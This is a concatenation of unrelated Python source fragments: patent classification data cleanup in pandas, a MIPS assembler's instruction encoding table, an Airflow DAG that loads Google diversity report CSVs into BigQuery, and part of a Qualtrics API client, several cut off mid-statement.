df.at [bre.Index, 'IPCR11' ] = tempoinv
if not isinstance(bre.IPCR7, list):
if bre.IPCR7 not in Exclus:
if ''.join(bre.IPCR7).strip().lower() != 'empty':
if bre.IPCR7.strip() not in Exclus:
df.at [bre.Index, 'IPCR7' ] = [bre.IPCR7.upper()]
else:
df.at [bre.Index, 'IPCR7' ] = []
else:
df.at [bre.Index, 'IPCR7' ] = []
else:
tempoinv = []
for inv in bre.IPCR7:
if ''.join(inv).strip().lower() != 'empty':
if inv.strip() not in Exclus:
tempoinv.append(inv.upper())
df.at [bre.Index, 'IPCR7' ] = tempoinv
if not isinstance(bre.IPCR4, list):
if bre.IPCR4 not in Exclus:
if ''.join(bre.IPCR4).strip().lower() != 'empty':
if bre.IPCR4.strip() not in Exclus:
df.at [bre.Index, 'IPCR4' ] = [bre.IPCR4.upper()]
else:
df.at [bre.Index, 'IPCR4' ] = []
else:
df.at [bre.Index, 'IPCR4' ] = []
else:
tempoinv = []
for inv in bre.IPCR4:
if ''.join(inv).strip().lower() != 'empty':
if inv.strip() not in Exclus:
tempoinv.append(inv.upper())
df.at [bre.Index, 'IPCR4' ] = tempoinv
if not isinstance(bre.IPCR3, list):
if bre.IPCR3 not in Exclus:
if ''.join(bre.IPCR3).strip().lower() != 'empty':
if bre.IPCR3.strip() not in Exclus:
df.at [bre.Index, 'IPCR3' ] = [bre.IPCR3.upper()]
else:
df.at [bre.Index, 'IPCR3' ] = []
else:
df.at [bre.Index, 'IPCR3' ] = []
else:
tempoinv = []
for inv in bre.IPCR3:
if inv.strip() not in Exclus:
if ''.join(inv).strip().lower() != 'empty':
tempoinv.append(inv.upper())
df.at [bre.Index, 'IPCR3' ] = tempoinv
if not isinstance(bre.IPCR1, list):
if bre.IPCR1 not in Exclus:
if ''.join(bre.IPCR1).strip().lower() != 'empty':
if bre.IPCR1.strip() not in Exclus:
df.at [bre.Index, 'IPCR1' ] = [bre.IPCR1.upper()]
else:
df.at [bre.Index, 'IPCR1' ] = []
else:
df.at [bre.Index, 'IPCR1' ] = []
else:
tempoinv = []
for inv in bre.IPCR1:
if ''.join(inv).strip().lower() != 'empty':
if inv.strip() not in Exclus:
tempoinv.append(inv.upper())
df.at [bre.Index, 'IPCR1' ] = tempoinv
if not isinstance(bre.equivalents, list):
if bre.equivalents.strip() not in Exclus:
df.at [bre.Index, 'equivalents' ] = [bre.equivalents]
else:
df.at [bre.Index, 'equivalents' ] = list (set([ipc for ipc in bre.equivalents if ipc.lower().strip() not in Exclus]))
if not isinstance(bre.CitedBy, list):
if bre.CitedBy.strip() not in Exclus:
df.at [bre.Index, 'CitedBy' ] = [bre.CitedBy]
else:
df.at [bre.Index, 'CitedBy' ] = list (set([ipc for ipc in bre.CitedBy if ipc.lower().strip() not in Exclus]))
if not isinstance(bre.CitP, list):
if bre.CitP.strip() not in Exclus:
df.at [bre.Index, 'CitP' ] = [bre.CitP]
else:
df.at [bre.Index, 'CitP' ] = list (set([ipc for ipc in bre.CitP if ipc.lower().strip() not in Exclus]))
if not isinstance(bre.CitO, list):
if bre.CitO.strip() not in Exclus:
df.at [bre.Index, 'CitO' ] = [bre.CitO]
else:
df.at [bre.Index, 'CitO' ] = list (set([ipc for ipc in bre.CitO if ipc.lower().strip() not in Exclus]))
assert(isinstance(df.at [bre.Index, 'IPCR1' ], list))
assert(isinstance(df.at [bre.Index, 'IPCR11' ], list))
assert(isinstance(df.at [bre.Index, 'IPCR3' ], list))
assert(isinstance(df.at [bre.Index, 'IPCR7' ], list))
assert(isinstance(df.at [bre.Index, 'IPCR4' ], list))
# df.at [bre.Index, 'IPCR1' ] = [truc for truc in bre.IPCR1 if truc.strip() not in Exclus] | |
RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('ADDU', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 33]], [RD, RS, RT])
self.fit('AND', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 36]], [RD, RS, RT])
self.fit('ANDI', [[OPCODE, 12], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('DADD', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 44]], [RD, RS, RT])
self.fit('DADDI', [[OPCODE, 24], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('DADDIU', [[OPCODE, 25], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('DADDU', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 45]], [RD, RS, RT])
self.fit('DDIV', [[OPCODE, 0], RS, RT, 10, [OPCODE, 30]], [RS, RT])
self.fit('DDIVU', [[OPCODE, 0], RS, RT, 10, [OPCODE, 31]], [RS, RT])
self.fit('DIV', [[OPCODE, 0], RS, RT, 10, [OPCODE, 26]], [RS, RT])
self.fit('DIVU', [[OPCODE, 0], RS, RT, 10, [OPCODE, 27]], [RS, RT])
self.fit('DMULT', [[OPCODE, 0], RS, RT, 10, [OPCODE, 28]], [RS, RT])
self.fit('DMULTU', [[OPCODE, 0], RS, RT, 10, [OPCODE, 29]], [RS, RT])
self.fit('DSLL', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 56]], [RD, RT, SA])
self.fit('DSLL32', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 60]], [RD, RT, SA])
self.fit('DSLLV', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 20]], [RD, RT, RS])
self.fit('DSRA', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 59]], [RD, RT, SA])
self.fit('DSRA32', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 63]], [RD, RT, SA])
self.fit('DSRAV', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 23]], [RD, RT, RS])
self.fit('DSRL', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 58]], [RD, RT, SA])
self.fit('DSRL32', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 62]], [RD, RT, SA])
self.fit('DSRLV', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 22]], [RD, RT, RS])
self.fit('DSUB', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 46]], [RD, RS, RT])
self.fit('DSUBU', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 47]], [RD, RS, RT])
self.fit('LUI', [[OPCODE, 15], 5, RD, IMMEDIATE], [RD, IMMEDIATE])
self.fit('MFHI', [[OPCODE, 0], 5, 5, RD, 5, [OPCODE, 16]], [RD])
self.fit('MFLO', [[OPCODE, 0], 5, 5, RD, 5, [OPCODE, 18]], [RD])
self.fit('MTHI', [[OPCODE, 0], RS, 15, [OPCODE, 17]], [RS])
self.fit('MTLO', [[OPCODE, 0], RS, 15, [OPCODE, 19]], [RS])
self.fit('MULT', [[OPCODE, 0], RS, RT, 10, [OPCODE, 24]], [RS, RT])
self.fit('MULTU', [[OPCODE, 0], RS, RT, 10, [OPCODE, 25]], [RS, RT])
self.fit('NOR', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 39]], [RD, RS, RT])
self.fit('OR', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 37]], [RD, RS, RT])
self.fit('ORI', [[OPCODE, 13], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('SLL', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 0]], [RD, RT, SA])
self.fit('SLLV', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 4]], [RD, RT, RS])
self.fit('SLT', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 42]], [RD, RS, RT])
self.fit('SLTI', [[OPCODE, 10], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('SLTIU', [[OPCODE, 11], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('SLTU', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 43]], [RD, RS, RT])
self.fit('SRA', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 3]], [RD, RT, SA])
self.fit('SRAV', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 7]], [RD, RT, RS])
self.fit('SRL', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 2]], [RD, RT, SA])
self.fit('SRLV', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 6]], [RD, RT, RS])
self.fit('SUB', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 34]], [RD, RS, RT])
self.fit('SUBU', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 35]], [RD, RS, RT])
self.fit('XOR', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 38]], [RD, RS, RT])
self.fit('XORI', [[OPCODE, 14], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
# Jump and Branch Instructions
self.fit('BEQ', [[OPCODE, 4], RS, RT, OFFSET], [RS, RT, OFFSET])
self.fit('BEQL', [[OPCODE, 20], RS, RT, OFFSET], [RS, RT, OFFSET])
self.fit('BGEZ', [[OPCODE, 1], RS, [FMT, 1], OFFSET], [RS, OFFSET])
self.fit('BGEZAL', [[OPCODE, 1], RS, [FMT, 17], OFFSET], [RS, OFFSET])
self.fit('BGEZALL', [[OPCODE, 1], RS, [FMT, 19], OFFSET], [RS, OFFSET])
self.fit('BGEZL', [[OPCODE, 1], RS, [FMT, 3], OFFSET], [RS, OFFSET])
self.fit('BGTZ', [[OPCODE, 7], RS, 5, OFFSET], [RS, OFFSET])
self.fit('BGTZL', [[OPCODE, 23], RS, 5, OFFSET], [RS, OFFSET])
self.fit('BLEZ', [[OPCODE, 6], RS, 5, OFFSET], [RS, OFFSET])
self.fit('BLEZL', [[OPCODE, 22], RS, 5, OFFSET], [RS, OFFSET])
self.fit('BLTZ', [[OPCODE, 1], RS, 5, OFFSET], [RS, OFFSET])
self.fit('BLTZAL', [[OPCODE, 1], RS, [FMT, 16], OFFSET], [RS, OFFSET])
self.fit('BLTZALL', [[OPCODE, 1], RS, [FMT, 18], OFFSET], [RS, OFFSET])
self.fit('BLTZL', [[OPCODE, 1], RS, [FMT, 2], OFFSET], [RS, OFFSET])
self.fit('BNEL', [[OPCODE, 21], RS, RT, OFFSET], [RS, RT, OFFSET])
self.fit('BNE', [[OPCODE, 5], RS, RT, OFFSET], [RS, RT, OFFSET])
self.fit('J', [[OPCODE, 2], ADDRESS], [ADDRESS])
self.fit('JAL', [[OPCODE, 3], ADDRESS], [ADDRESS])
self.fit('JALR', [[OPCODE, 0], RS, 5, RT, 5, [OPCODE, 9]], [RT, RS])
self.fit('JR', [[OPCODE, 0], RT, 15, [OPCODE, 8]], [RT])
# Special Instructions
self.fit('BREAK', [[OPCODE, 0], CODE_20, [OPCODE, 13]], [CODE_20])
self.fit('SYSCALL', [[OPCODE, 0], CODE_20, [OPCODE, 12]], [CODE_20])
# Exception Instructions
self.fit('TEQ', [[OPCODE, 0], RS, RT, CODE_10, [OPCODE, 52]], [CODE_10, RS, RT])
self.fit('TEQI', [[OPCODE, 1], RS, [FMT, 12], IMMEDIATE], [RS, IMMEDIATE])
self.fit('TGE', [[OPCODE, 0], RS, RT, CODE_10, [OPCODE, 48]], [CODE_10, RS, RT])
self.fit('TGEI', [[OPCODE, 1], RS, [FMT, 8], IMMEDIATE], [RS, IMMEDIATE])
self.fit('TGEIU', [[OPCODE, 1], RS, [FMT, 9], IMMEDIATE], [RS, IMMEDIATE])
self.fit('TGEU', [[OPCODE, 0], RS, RT, CODE_10, [OPCODE, 49]], [CODE_10, RS, RT])
self.fit('TLT', [[OPCODE, 0], RS, RT, CODE_10, [OPCODE, 50]], [CODE_10, RS, RT])
self.fit('TLTI', [[OPCODE, 1], RS, [FMT, 10], IMMEDIATE], [RS, IMMEDIATE])
self.fit('TLTIU', [[OPCODE, 1], RS, [FMT, 11], IMMEDIATE], [RS, IMMEDIATE])
self.fit('TLTU', [[OPCODE, 0], RS, RT, CODE_10, [OPCODE, 51]], [CODE_10, RS, RT])
self.fit('TNE', [[OPCODE, 0], RS, RT, CODE_10, [OPCODE, 54]], [CODE_10, RS, RT])
self.fit('TNEI', [[OPCODE, 1], RS, [FMT, 14], IMMEDIATE], [RS, IMMEDIATE])
# System Control Processor (COP0) Instructions
self.fit('CACHE', [[OPCODE, 47], BASE, OP, IMMEDIATE], [OP, IMMEDIATE, BASE])
self.fit('DMFC0', [[OPCODE, 16], [EX_OPCODE, 1], RD, CS, 5, [OPCODE, 0]], [RD, CS])
self.fit('DMTC0', [[OPCODE, 16], [EX_OPCODE, 5], RT, CS, 5, [OPCODE, 0]], [RT, CS])
self.fit('ERET', [[OPCODE, 16], CO, 19, [OPCODE, 24]], [])
self.fit('MFC0', [[OPCODE, 16], [EX_OPCODE, 0], RD, CS, 5, [OPCODE, 0]], [RD, CS])
self.fit('MTC0', [[OPCODE, 16], [EX_OPCODE, 4], RT, CS, 5, [OPCODE, 0]], [RT, CS])
self.fit('TLBP', [[OPCODE, 16], CO, 19, [OPCODE, 8]], [])
self.fit('TLBR', [[OPCODE, 16], CO, 19, [OPCODE, 1]], [])
self.fit('TLBWI', [[OPCODE, 16], CO, 19, [OPCODE, 2]], [])
self.fit('TLBWR', [[OPCODE, 16], CO, 19, [OPCODE, 6]], [])
# Floating-point Unit (COP1) Instructions
# These, instead of having OPCODE as the final segment, should be [ES, 3], [COND, (0 to 15 for each code)]
# But changing it to what I have optimises it slightly
self.fit('C.F.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 48]], [FS, FT])
self.fit('C.UN.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 49]], [FS, FT])
self.fit('C.EQ.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 50]], [FS, FT])
self.fit('C.UEQ.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 51]], [FS, FT])
self.fit('C.OLT.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 52]], [FS, FT])
self.fit('C.ULT.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 53]], [FS, FT])
self.fit('C.OLE.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 54]], [FS, FT])
self.fit('C.ULE.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 55]], [FS, FT])
self.fit('C.SF.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 56]], [FS, FT])
self.fit('C.NGLE.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 57]], [FS, FT])
self.fit('C.SEQ.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 58]], [FS, FT])
self.fit('C.NGL.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 59]], [FS, FT])
self.fit('C.LT.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 60]], [FS, FT])
self.fit('C.NGE.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 61]], [FS, FT])
self.fit('C.LE.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 62]], [FS, FT])
self.fit('C.NGT.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 63]], [FS, FT])
self.fit('C.F.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 48]], [FS, FT])
self.fit('C.UN.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 49]], [FS, FT])
self.fit('C.EQ.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 50]], [FS, FT])
self.fit('C.UEQ.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 51]], [FS, FT])
self.fit('C.OLT.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 52]], [FS, FT])
self.fit('C.ULT.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 53]], [FS, FT])
self.fit('C.OLE.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 54]], [FS, FT])
self.fit('C.ULE.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 55]], [FS, FT])
self.fit('C.SF.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 56]], [FS, | |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from airflow import DAG
from airflow.providers.google.cloud.transfers import gcs_to_bigquery
default_args = {
"owner": "Google",
"depends_on_past": False,
"start_date": "2021-05-01",
}
with DAG(
dag_id="google_dei.diversity_annual_report",
default_args=default_args,
max_active_runs=1,
schedule_interval="@once",
catchup=False,
default_view="graph",
) as dag:
# Task to load CSV data to a BigQuery table
load_intersectional_attrition_index_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_intersectional_attrition_index_to_bq",
bucket="{{ var.json.google_dei.storage_bucket }}",
source_objects=["DAR/2022/intersectional_attrition_index.csv"],
source_format="CSV",
destination_project_dataset_table="google_dei.dar_intersectional_attrition_index",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{
"name": "workforce",
"description": "Overall and sub-categories",
"type": "string",
"mode": "required",
},
{
"name": "report_year",
"description": "The year the report was published",
"type": "integer",
"mode": "required",
},
{
"name": "gender_us",
"description": "Gender of Googler exits in the U.S.",
"type": "string",
"mode": "required",
},
{
"name": "race_asian",
"description": "The attrition index score of Googlers in the U.S. who identify as Asian and zero or more other races",
"type": "integer",
"mode": "nullable",
},
{
"name": "race_black",
"description": "The attrition index score of Googlers in the U.S. who identify as Black and zero or more other races",
"type": "integer",
"mode": "nullable",
},
{
"name": "race_hispanic_latinx",
"description": "The attrition index score of Googlers in the U.S. who identify as Hispanic or Latinx and zero or more other races",
"type": "integer",
"mode": "nullable",
},
{
"name": "race_native_american",
"description": "The attrition index score of Googlers in the U.S. who identify as Native American and zero or more other races",
"type": "integer",
"mode": "nullable",
},
{
"name": "race_white",
"description": "The attrition index score of Googlers in the U.S. who identify as White and zero or more other races",
"type": "integer",
"mode": "nullable",
},
],
)
# Task to load CSV data to a BigQuery table
load_intersectional_hiring_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_intersectional_hiring_to_bq",
bucket="{{ var.json.google_dei.storage_bucket }}",
source_objects=["DAR/2022/intersectional_hiring.csv"],
source_format="CSV",
destination_project_dataset_table="google_dei.dar_intersectional_hiring",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{
"name": "workforce",
"description": "Overall and sub-categories",
"type": "string",
"mode": "required",
},
{
"name": "report_year",
"description": "The year the report was published",
"type": "integer",
"mode": "required",
},
{
"name": "gender_us",
"description": "Gender of Googlers hired in the U.S.",
"type": "string",
"mode": "required",
},
{
"name": "race_asian",
"description": "The percentage of Googlers hired in the U.S. who identify as Asian and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_black",
"description": "The percentage of Googlers hired in the U.S. who identify as Black and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_hispanic_latinx",
"description": "The percentage of Googlers hired in the U.S. who identify as Hispanic or Latinx and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_native_american",
"description": "The percentage of Googlers hired in the U.S. who identify as Native American and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_white",
"description": "The percentage of Googlers hired in the U.S. who identify as White and zero or more other races",
"type": "float",
"mode": "nullable",
},
],
)
# Task to load CSV data to a BigQuery table
load_intersectional_representation_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_intersectional_representation_to_bq",
bucket="{{ var.json.google_dei.storage_bucket }}",
source_objects=["DAR/2022/intersectional_representation.csv"],
source_format="CSV",
destination_project_dataset_table="google_dei.dar_intersectional_representation",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{
"name": "workforce",
"description": "Overall and sub-categories",
"type": "string",
"mode": "required",
},
{
"name": "report_year",
"description": "The year the report was published",
"type": "integer",
"mode": "required",
},
{
"name": "gender_us",
"description": "Gender of Googlers in the U.S.",
"type": "string",
"mode": "required",
},
{
"name": "race_asian",
"description": "The percentage of Googlers in the U.S. who identify as Asian and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_black",
"description": "The percentage of Googlers in the U.S. who identify as Black and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_hispanic_latinx",
"description": "The percentage of Googlers in the U.S. who identify as Hispanic or Latinx and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_native_american",
"description": "The percentage of Googlers in the U.S. who identify as Native American and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_white",
"description": "The percentage of Googlers in the U.S. who identify as White and zero or more other races",
"type": "float",
"mode": "nullable",
},
],
)
# Task to load CSV data to a BigQuery table
load_intersectional_exits_representation_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_intersectional_exits_representation_to_bq",
bucket="{{ var.json.google_dei.storage_bucket }}",
source_objects=["DAR/2022/intersectional_exits_representation.csv"],
source_format="CSV",
destination_project_dataset_table="google_dei.dar_intersectional_exits_representation",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{
"name": "workforce",
"description": "Overall and sub-categories",
"type": "string",
"mode": "required",
},
{
"name": "report_year",
"description": "The year the report was published",
"type": "integer",
"mode": "required",
},
{
"name": "gender_us",
"description": "Gender of Googler exits in the U.S.",
"type": "string",
"mode": "required",
},
{
"name": "race_asian",
"description": "The percentage of Googler exits in the U.S. who identify as Asian and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_black",
"description": "The percentage of Googler exits in the U.S. who identify as Black and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_hispanic_latinx",
"description": "The percentage of Googler exits in the U.S. who identify as Hispanic or Latinx and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_native_american",
"description": "The percentage of Googler exits in the U.S. who identify as Native American and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_white",
"description": "The percentage of Googler exits in the U.S. who identify as White and zero or more other races",
"type": "float",
"mode": "nullable",
},
],
)
# Task to load CSV data to a BigQuery table
load_non_intersectional_representation_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_non_intersectional_representation_to_bq",
bucket="{{ var.json.google_dei.storage_bucket }}",
source_objects=["DAR/2022/non_intersectional_representation.csv"],
source_format="CSV",
destination_project_dataset_table="google_dei.dar_non_intersectional_representation",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{
"name": "workforce",
"description": "Overall and sub-categories",
"type": "string",
"mode": "required",
},
{
"name": "report_year",
"description": "The year the report was published",
"type": "integer",
"mode": "required",
},
{
"name": "race_asian",
"description": "The percentage of Googlers in the U.S. who identify as Asian and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_black",
"description": "The percentage of Googlers in the U.S. who identify as Black and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_hispanic_latinx",
"description": "The percentage of Googlers in the U.S. who identify as Hispanic or Latinx and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_native_american",
"description": "The percentage of Googlers in the U.S. who identify as Native American and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_white",
"description": "The percentage of Googlers in the U.S. who identify as White and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "gender_us_women",
"description": "The percentage of Googlers in the U.S. who identify as women",
"type": "float",
"mode": "nullable",
},
{
"name": "gender_us_men",
"description": "The percentage of Googlers in the U.S. who identify as men",
"type": "float",
"mode": "nullable",
},
{
"name": "gender_global_women",
"description": "The percentage of global Googlers who identify as women",
"type": "float",
"mode": "nullable",
},
{
"name": "gender_global_men",
"description": "The percentage of global Googlers who identify as men",
"type": "float",
"mode": "nullable",
},
],
)
# Task to load CSV data to a BigQuery table
load_non_intersectional_exits_representation_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_non_intersectional_exits_representation_to_bq",
bucket="{{ var.json.google_dei.storage_bucket }}",
source_objects=["DAR/2022/non_intersectional_exits_representation.csv"],
source_format="CSV",
destination_project_dataset_table="google_dei.dar_non_intersectional_exits_representation",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{
"name": "workforce",
"description": "Overall and sub-categories",
"type": "string",
"mode": "required",
},
{
"name": "report_year",
"description": "The year the report was published",
"type": "integer",
"mode": "required",
},
{
"name": "race_asian",
"description": "The percentage of Googler exits in the U.S. who identify as Asian and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_black",
"description": "The percentage of Googler exits in the U.S. who | |
complete to the local file system
https://api.qualtrics.com/docs/get-response-export-file
:param responseExportId: The ID given to you after running your Response Export call or URL return by GetResponseExportProgress
:type responseExportId: str
:param filename: where to save zip file returned by Qualtrics
:type filename: str
:return: True is success, None if error
"""
if "https://" in responseExportId:
url = responseExportId
else:
url = "https://survey.qualtrics.com/API/v3/responseexports/%s/file" % responseExportId
response = self.request3(url, method="get", stream=True)
if response is None:
return None
self.last_error_message = None
with open(filename, "wb") as fp:
for chunk in response.iter_content(8192):
fp.write(chunk)
return True
def request(self, Request, Product='RS', post_data=None, post_files=None, **kwargs):
""" Send GET or POST request to Qualtrics API using v2.x format
https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#overview_2.5
This function also sets self.last_error_message and self.json_response
:param Request: The name of the API call to be made ("createPanel", "deletePanel" etc).
:param post_data: Content of POST request. If None, GET request will be sent
:param post_files: Files to post (for importSurvey API call)
:param kwargs: Additional parameters for this API Call (LibraryID="abd", PanelID="123")
:return: None if request failed
"""
Version = kwargs.pop("Version", self.default_api_version)
# Version must be a string, not an integer or float
assert Version, STR
# Handling for Multi Product API calls
if self.url:
# Force URL, for use in unittests.
url = self.url
elif Product == 'RS':
url = "https://survey.qualtrics.com/WRAPI/ControlPanel/api.php"
elif Product == 'TA':
url = "https://survey.qualtrics.com/WRAPI/Contacts/api.php"
else:
raise NotImplementedError('Please specify a valid product api')
# Special case for handling embedded data
ed = kwargs.pop("ED", None)
# http://stackoverflow.com/questions/38987/how-can-i-merge-two-python-dictionaries-in-a-single-expression
params = {"User": self.user,
"Token": <PASSWORD>.token,
"Format": "JSON",
"Version": Version,
"Request": Request,
}
# Python 2 and 3 compatible dictionary merge
for item in kwargs:
params[item] = kwargs[item]
# Format embedded data properly,
# Example: ED[SubjectID]=CLE10235&ED[Zip]=74534
if ed is not None:
for key in ed:
params["ED[%s]" % key] = ed[key]
self.json_response = None
self.last_error_message = "Not yet set by request function"
self.last_status_code = None
try:
if post_data:
r = requests.post(url,
data=post_data,
params=params,
**self.requests_kwargs)
elif post_files:
r = requests.post(url,
files=post_files,
params=params,
**self.requests_kwargs)
else:
r = requests.get(
url,
params=params,
**self.requests_kwargs
)
except (ConnectionError, Timeout, TooManyRedirects, HTTPError) as e:
# http://docs.python-requests.org/en/master/user/quickstart/#errors-and-exceptions
# ConnectionError: In the event of a network problem (e.g. DNS failure, refused connection, etc) Requests will raise a ConnectionError exception.
# HTTPError: Response.raise_for_status() will raise an HTTPError if the HTTP request returned an unsuccessful status code.
# Timeout: If a request times out, a Timeout exception is raised.
# TooManyRedirects: If a request exceeds the configured number of maximum redirections, a TooManyRedirects exception is raised.
self.last_url = ""
self.response = None
self.last_error_message = str(e)
return None
self.last_url = r.url
self.response = r.text
self.last_status_code = r.status_code
if r.status_code == 403:
self.last_error_message = "API Error: HTTP Code %s (Forbidden)" % r.status_code
return None
if r.status_code == 401 and Request == "getSurvey":
# I'm don't know if 401 is returned for requests other than getSurvey
self.last_error_message = "API Error: HTTP Code %s (Unauthorized)" % r.status_code
return None
# Apparently, getSurvey now returns error 500 and error message in XML format:
# <XML>
# <Meta>
# <Status>Error</Status>
# <RequestType>getSurvey</RequestType>
# <ErrorCode>500</ErrorCode>
# <QualtricsErrorCode>ESRV18</QualtricsErrorCode>
# <ErrorMessage>This survey is Unknown to this user account.</ErrorMessage>
# <Debug></Debug>
# </Meta>
# <Result></Result>
# </XML>
if r.status_code == 500 and Request == "getSurvey":
root = ET.fromstring(r.text)
try:
self.last_error_message = root.find("Meta").find("ErrorMessage").text
except AttributeError:
# 'NoneType' object has no attribute 'text'
self.last_error_message = "Internal server error"
return None
try:
if Request == "getLegacyResponseData":
# Preserve order of responses and fields in each response using OrderedDict
json_response = json.loads(r.text, object_pairs_hook=collections.OrderedDict)
else:
# Don't not use OrderedDict for simplicity.
json_response = json.loads(r.text)
except ValueError:
# If the data being deserialized is not a valid JSON document, a ValueError will be raised.
self.json_response = None
if "Format" not in kwargs:
self.last_error_message = "Unexpected response from Qualtrics: not a JSON document"
return None
else:
# Special case - getSurvey. That request has a custom response format (xml).
# It does not follow the default response format
self.last_error_message = None
return r.text
self.json_response = json_response
# Sanity check.
if (Request == "getLegacyResponseData" or Request == "getPanel" or Request ==
"getListContacts") and "Meta" not in json_response:
# Special cases - getLegacyResponseData, getPanel and getListContacts
# Success
self.last_error_message = None
return json_response
if "Meta" not in json_response:
# Should never happen
self.last_error_message = "Unexpected response from Qualtrics: no Meta key in JSON response"
return None
if "Status" not in json_response["Meta"]:
# Should never happen
